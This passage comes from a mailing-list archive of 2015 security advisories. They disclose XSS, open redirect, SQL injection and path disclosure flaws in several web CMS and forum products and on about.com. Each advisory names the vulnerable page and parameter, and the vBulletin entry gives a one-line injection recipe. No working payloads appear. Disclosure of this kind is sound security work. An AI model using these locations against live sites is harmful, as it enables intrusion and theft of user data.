integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster , are available through SupeSite, easy to build
a community portal for Web2.0.

Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions.



*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Reflected XSS
(Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at cp.php? page with do parameter.










*References:*
http://tetraph.com/security/xss-vulnerability/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-reflected-xss.html

http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014r=1w=3






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] NetCat CMS Multiple URL Redirection (Open Redirect) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*NetCat CMS Multiple URL Redirection (Open Redirect) Security
Vulnerabilities*



Exploit Title: NetCat CMS Multiple URL Redirection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
NetCat


*Product  Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL  Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. NetCat designed to create an absolute
majority of the types of sites: from simple business card with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section.

Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000.





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by URL Redirection
(Open Redirect) attacks.

*(2.1)* The first vulnerability occurs at modules/redir/? page with
site parameter.

*(2.2)* The second vulnerability occurs at redirect.php? page with url
parameter.

*(2.3)* The third vulnerability occurs at netshop/post.php page with
redirect_url parameter







*References:*
http://tetraph.com/security/open-redirect/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-url-redirection.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014r=1w=2






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities*



Exploit Title: InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities
Product: InstantForum.NET
Vendor: InstantASP
Vulnerable Versions: v4.1.3   v4.1.1   v4.1.2   v4.0.0   v4.1.0   v3.4.0
Tested Version: v4.1.3   v4.1.1   v4.1.2
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9468
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
InstantASP


*Product  Version:*
InstantForum.NET
v4.1.3 v4.1.1 v4.1.2 v4.0.0 v4.1.0 v3.4.0


*Vendor URL  Download:*
InstantForum.NET can be downloaded from here,
http://docs.instantasp.co.uk/InstantForum/default.html?page=v413tov414guide.html


*Product Introduction:*
“InstantForum.NET is a feature rich, ultra high performance ASP.NET  SQL
Server discussion forum solution designed to meet the needs of the most
demanding online communities or internal collaboration environments. Now in
the forth generation, InstantForum.NET has been completely rewritten from
the ground-up over several months to introduce some truly unique features 
performance enhancements.

The new administrator control panel now offers the most comprehensive
control panel available for any ASP.NET based forum today. Advanced
security features such as role based permissions and our unique Permission
Sets feature provides unparalleled configurable control over the content
and features that are available to your users within the forum. Moderators
can easily be assigned to specific forums with dedicated moderator
privileges for each forum. Bulk moderation options ensure even the busiest
forums can be managed effectively by your moderators.

The forums template driven skinning architecture offers complete
customization support. Each skin can be customized to support a completely
unique layout or visual appearance. A single central style sheet controls
every aspect of a skins appearance. The use of unique HTML wrappers and
ASP.NET 1.1 master pages ensures page designers can easily integrate an
existing design around the forum. Skins, wrappers  master page templates
can be applied globally to all forums or to any specific forum.





*(2) Vulnerability Details:*
InstantForum.NET has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at “Join.aspx” page with SessionID
parameter of it.

*(2.2)* The second vulnerability occurs at “Logon.aspx” page with
SessionID parameter of it.









*References:*
http://tetraph.com/security/cves/cve-2014-9468-instantasp-instantforum-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9468-instantasp.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9468
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9468
https://security-tracker.debian.org/tracker/CVE-2014-9468
http://www.cvedetails.com/cve/CVE-2014-9468/
http://www.security-database.com/detail.php?alert=CVE-2014-9468
http://packetstormsecurity.com/files/cve/CVE-2014-9468
http://www.pentest.it/cve-2014-9468.html
http://www.naked-security.com/cve/CVE-2014-9468/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9468/
http://007software.net/cve-2014-9468/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9468/
https://vulnerabilitypost.wordpress.com/2015/02/18/cve-2014-9468/
https://security-tracker.debian.org/tracker/CVE-2014-9468








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities*



Exploit Title: DLGuard Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities

Product: DLGuard

Vendor: DLGuard

Vulnerable Versions: v5   v4.6   v4.5

Tested Version: v5   v4.6

Advisory Publication: Feb 18, 2015

Latest Update: Feb 18, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*




*(1) Vendor  Product Description:*



*Vendor:*
DLGuard



*Product  Version:*
DLGuard
v5   v4.6   v4.5



*Vendor URL  Download:*
DLGuard can be downloaded from here,

http://www.dlguard.com/dlginfo/index.php



*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.

DLGuard supports the three types, or methods, of sale on the internet:

1Single item sales (including bonus products!)

2Multiple item sales

3Membership websites





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at “index.php” page with page c
redirect parameters of it.

*(2.2)* The second vulnerability occurs at main page's search field with
searchTerm parameter in HTTP POST.








*References:*
http://tetraph.com/security/xss-vulnerability/dlguard-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-multiple-xss-cross-site.html








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Full Path Disclosure (Information Leakage) Security
Vulnerabilities*



Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
DLGuard


*Product  Version:*
DLGuard
v4.5


*Vendor URL  Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.


DLGuard supports the three types, or methods, of sale on the internet:
1Single item sales (including bonus products!)
2Multiple item sales
3Membership websites





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by Full Path Disclosure
attacks.


*(2.1)* The first vulnerability occurs at “index.php” page with c
parameters of it.






*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] DLGuard SQL Injection Security Vulnerabilities

2015-02-18 Thread Jing Wang
DLGuard SQL Injection Security Vulnerabilities


Exploit Title: DLGuard /index.php c parameter SQL Injection Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
DLGuard


*Product  Version:*
DLGuard
v4.5


*Vendor URL  Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.

DLGuard supports the three types, or methods, of sale on the internet:
1Single item sales (including bonus products!)
2Multiple item sales
3Membership websites





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by SQL Injection
attacks.


*(2.1)* The first vulnerability occurs at “index.php” page with c
parameters of it.







*References:*
http://tetraph.com/security/sql-injection-vulnerability/dlguard-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-sql-injection-security.html





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-12 Thread Jing Wang
*CVE-2014-8753  Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: Cit-e-Access
Vendor: Cit-e-Net
Vulnerable Versions: Version 6
Tested Version: Version 6
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8753
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





*Advisory Details:*
*(1) Vendor  Product Description:*

*Vendor:*
Cit-e-Net

*Product  Version: *
Cit-e-Access
Version 6

*Vendor URL  Download: *
Cit-e-Net can be downloaded from here,
https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf
http://demo.cit-e.net/
http://www.cit-e.net/demorequest.cfm
http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1TPID=17

*Product Introduction:*
We are a premier provider of Internet-based solutions encompassing web
site development and modular interactive e-government applications which
bring local government, residents and community businesses together.

Cit-e-Net provides a suite of on-line interactive services to counties,
municipalities, and other government agencies, that they in turn can offer
to their constituents. The municipal government achieves a greater degree
of efficiency and timeliness in conducting the daily operations of
government, while residents receive improved and easier access to city hall
through the on-line access to government services.




*(2) Vulnerability Details:*
Cit-e-Access has a security problem. It can be exploited by XSS attacks.

*(2.1)* The first vulnerability occurs at /eventscalendar/index.cfm? page
with DID parameter in HTTP GET.

*(2.2)* The second vulnerability occurs at /search/index.cfm? page with
keyword parameter in HTTP POST.

*(2.3)* The third vulnerability occurs at /news/index.cfm page with
jump2 DID parameter in HTTP GET.

*(2.4)* The fourth vulnerability occurs at eventscalendar? page with
TPID parameter in HTTP GET.

*(2.5) *The fifth vulnerability occurs at /meetings/index.cfm? page with
DID parameter in HTTP GET.




*(3) Solutions:*
Leave message to vendor. No response.
http://www.cit-e.net/contact.cfm









*References:*
http://tetraph.com/security/cves/cve-2014-8753-cit-e-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-8753-cit-e-net-multiple-xss.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8753
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8753
https://security-tracker.debian.org/tracker/CVE-2014-8753
http://www.cvedetails.com/cve/CVE-2014-8753/
http://www.security-database.com/detail.php?alert=CVE-2014-8753
http://packetstormsecurity.com/files/cve/CVE-2014-8753
http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/
http://www.pentest.it/cve-2014-8753.html
http://www.naked-security.com/cve/CVE-2014-8753/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/
http://007software.net/cve-2014-8753/
https://itinfotechnology.wordpress.com/2015/02/12/cve-2014-8753/
https://security-tracker.debian.org/tracker/CVE-2014-8753







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-12 Thread Jing Wang
*CVE-2014-9469  vBulletin XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities
Product: vBulletin Forum
Vendor: vBulletin
Vulnerable Versions: 5.1.3   5.0.5   4.2.2   3.8.7   3.6.7   3.6.0   3.5.4
Tested Version: 5.1.3 4.2.2
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9469
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





*Advisory Details:*

*(1) Vendor  Product Description:*

*Vendor:*
vBulletin


*Product  Version: *
vBulletin Forum
5.1.3   5.0.5   4.2.2   3.8.7   3.6.7   3.6.0   3.5.4


*Vendor URL  Download: *
vBulletin can be downloaded from here,
https://www.vbulletin.com/purchases/


*Product Introduction:*
vBulletin (vB) is a proprietary Internet forum software package developed
by vBulletin Solutions, Inc., a division of Internet Brands. It is written
in PHP and uses a MySQL database server.

Since the initial release of the vBulletin forum product in 2000, there
have been many changes and improvements. Below is a list of the major
revisions and some of the changes they introduced. The current production
version is 3.8.7, 4.2.2, and 5.1.3.




*(2) Vulnerability Details:*
vBulletin has a security problem. It can be exploited by XSS attacks.

*(2.1) *The vulnerability occurs at forum/help page. Add hash symbol
first. Then add script at the end of it.






*References:*
http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469
https://security-tracker.debian.org/tracker/CVE-2014-9469
http://www.cvedetails.com/cve/CVE-2014-9469/
http://www.security-database.com/detail.php?alert=CVE-2014-9469
http://packetstormsecurity.com/files/cve/CVE-2014-9469
http://www.pentest.it/cve-2014-9469.html
http://www.naked-security.com/cve/CVE-2014-9469/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/
http://007software.net/cve-2014-9469/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/
https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/
https://security-tracker.debian.org/tracker/CVE-2014-9469






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-02 Thread Jing Wang
*CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site
Scripting) Security Vulnerabilities*





Exploit Title:  OptimalSite CMS /display_dialog.php image Parameter XSS
Security Vulnerability
Vendor: OptimalSite
Product: OptimalSite Content Management System (CMS)
Vulnerable Versions: V.1 V2.4
Tested Version: V.1 V2.4
Advisory Publication: Feb 2, 2015
Latest Update: Feb 2, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9562
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Advisory Details:*

*(1) Vendor  Product Description*

*Vendor:*
OptimalSite


*Product  Version:*
OptimalSite Content Management System (CMS)
V.1
V2.4


*Vendor URL  Download:*
http://www.optimalsite.com/en/



*Product Description:*
“Content management system OptimalSite is an online software package that
enables the management of information published on a website.”

“OptimalSite consists of the system core and integrated modules, which
allow expanding website possibilities and functionality. You may select a
set of modules that suits your needs best.”





*(2) Vulnerability Details:*
OptimalSite Content Management System (CMS) has a security problem. It can
be exploited by XSS attacks.

*(2.1) *The vulnerability occurs at “display_dialog.php” page with “image”
parameter.







*References:*
http://tetraph.com/security/cves/cve-2014-9562-optimalsite-content-management-system-cms-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9562-optimalsite-content.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9562
https://security-tracker.debian.org/tracker/CVE-2014-9562
http://www.cvedetails.com/cve/CVE-2014-9562/
http://www.security-database.com/detail.php?alert=CVE-2014-9562
http://packetstormsecurity.com/files/cve/CVE-2014-9562
http://www.pentest.it/cve-2014-9562.html
http://www.naked-security.com/cve/CVE-2014-9562/
http://007software.net/cve-2014-9562/
https://security-tracker.debian.org/tracker/CVE-2014-9562








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities

2015-02-02 Thread Jing Wang
*About Group (about.com http://about.com) All Topics (At least 99.88%
links) Vulnerable to XSS  Iframe Injection Security Attacks, About.com
Open Redirect Security Vulnerabilities*




*Vulnerability Description:*
About.com all topic sites are vulnerable to XSS (Cross-Site Scripting)
and Iframe Injection (Cross Frame Scripting) attacks. This means all
sub-domains of about.com are affected. Based on a self-written program,
94357 links were tested. Only 118 links do not belong to the topics
(Metasites) links. Meanwhile, some about.com main pages are vulnerable to
XSS attack, too. This means no more than 0.125% links are not affected. At
least 99.875% links of About Group are vulnerable to XSS and Iframe
Injection attacks. In fact, for about.com's structure, the main domain is
something just like a cover. So, very few links belong to them.

Simultaneously, the About.com main page's search field is vulnerable to XSS
attacks, too. This means all domains related to about.com are vulnerable to
XSS attacks.

For the Iframe Injection vulnerability. They can be used to do DOS
(Denial-of-Service Attack) to other websites, too.

In the last, some Open Redirect vulnerabilities related to about.com are
introduced. There may be large number of other Open Redirect
Vulnerabilities not detected. Since About.com are trusted by some the other
websites. Those vulnerabilities can be used to do Covert Redirect to
these websites.





*Vulnerability Disclosure:*
Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No
one replied. Until now, they are still unpatched.





*Vulnerability Discover:*
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing






*(1) Some Basic Background*

*(1.1) Domain Description:*
http://www.about.com/

For March 2014, 61,428,000 unique visitors were registered by comScore for
About.com, making it the 16th-most-visited online property for that month.
(The New York Times)

About.com, also known as The About Group (formerly About Inc.), is an
Internet-based network of content that publishes articles and videos about
various subjects on its topic sites, of which there are nearly 1,000. The
website competes with other online resource sites and encyclopedias,
including those of the Wikimedia Foundation (Wikipedia)

As of May 2013, About.com was receiving about 84 million unique monthly
visitors. (TechCrunch. AOL Inc.)

According to About's online media kit, nearly 1,000 Experts (freelance
writers) contribute to the site by writing on various topics, including
healthcare and travel. (About.com)




*(1.2) Topics Related to About.com*
The Revolutionary About.com Directory and Community Metasite. Hundreds of
real live passionate Guides covering Arts, Entertainment, Business,
Industry, Science, Technology, Culture, Health, Fitness, Games,Travel,
News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms,
Education, Computers, Hobbies and Local Information. (azlist.about.com)

About.com - Sites A to Z
Number of Topics
A: 66
B: 61
C: 118
D: 49
E: 33
F: 57
G: 39
H: 48
I: 32
J: 15
K: 13
L: 36
M: 70
N: 26
O: 23
P: 91
Q: 4
R: 32
S: 104
T: 47
U: 12
V: 9
W: 43
X: 1
Y: 4
Z: 1
SUM: 1039

Reference:
azlist.about.com/

In fact, those are not all topics of about.com. Some of the topics are not
listed here such as,
http://specialchildren.about.com

So, there are more than 1000 topics related to about.com





*(1.3) Result of Exploiting XSS Attacks*
Exploited XSS is commonly used to achieve the following malicious results
Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user’s web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks (DOS)
 (Acunetix)






*(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities*
In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific
cross-frame-scripting bug in a web browser to access private data on a
third-party website. The attacker induces the browser user to navigate to a
web page the attacker controls; the attacker's page loads a third-party
page in an HTML frame; and then JavaScript executing in the attacker's page
steals data from the third-party page. (OWASP)

XFS also sometimes is used to describe an XSS attack which uses an HTML
frame in the attack. For example, an attacker might exploit a Cross Site
Scripting Flaw to inject a frame into a third-party web page; or an
attacker might create a page which uses a frame to load a third-party page
with an XSS flaw. (OWASP)






*(1.5) Basic of Open Redirect (Dest Redirect Privilege Escalation)
Vulnerabilities*
An open redirect is an application that takes a parameter and redirects a
user to the parameter value without any validation. This 

[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

2015-01-31 Thread Jing Wang
CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS
Product: SnipSnap
Vulnerable Versions: 0.5.2a  1.0b1  1.0b2
Tested Version: 0.5.2a  1.0b1  1.0b2
Advisory Publication: Jan 30, 2015
Latest Update: Jan 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9559
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





Advisory Details:


(1) Vendor  Product Description

Vendor:
SnipSnap

Product  Version:
SnipSnap
0.5.2a
1.0b1
1.0b2


Vendor URL  Download:
http://snipsnap.org

Product Description:
SnipSnap is a user friendly content management system with features such
as wiki and weblog. 







(2) Vulnerability Details:
SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at snipsnap-search? page with query
parameter.






References:
http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559
https://security-tracker.debian.org/tracker/CVE-2014-9559
http://www.cvedetails.com/cve/CVE-2014-9559/
http://www.security-database.com/detail.php?alert=CVE-2014-9559
http://packetstormsecurity.com/files/cve/CVE-2014-9559
http://www.pentest.it/cve-2014-9559.html
http://www.naked-security.com/cve/CVE-2014-9559/
http://007software.net/cve-2014-9559/
https://security-tracker.debian.org/tracker/CVE-2014-9559






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities

2015-01-22 Thread Jing Wang
*CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple SQL Injection Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: CVE-2014-9558
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor  Product Description*

*Vendor:* Smartwebsites

*Product  Version:* SmartCMS v.2

*Vendor URL  Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13lang=en

*Product Description:*
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”




*(2) Vulnerability Details:*

SmartCMS v.2 has a security vulnerability. It can be exploited by SQL
Injection attacks.

*(2.1) *The first vulnerability occurs at “index.php?” page with “pageid”,
“lang” multiple parameters.

